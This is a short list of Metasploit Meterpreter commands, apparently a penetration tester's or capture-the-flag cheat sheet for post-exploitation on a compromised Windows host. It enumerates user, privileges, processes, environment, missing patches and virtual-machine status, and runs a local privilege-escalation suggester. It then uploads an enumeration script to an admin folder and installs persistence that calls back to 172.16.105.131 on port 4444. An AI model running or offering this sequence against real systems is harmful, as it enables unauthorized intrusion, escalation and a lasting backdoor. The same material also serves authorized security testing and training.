getuid
show_mount
getpid
getprivs
ps
localtime
sysinfo
run post/multi/gather/env
run post/windows/gather/enum_patches
run post/multi/recon/local_exploit_suggester
run post/windows/gather/checkvm
cd "C:\users\admin"
upload /opt/JAWS/jaws-enum.ps1
run persistence -A -U -p 4444 -r 172.16.105.131
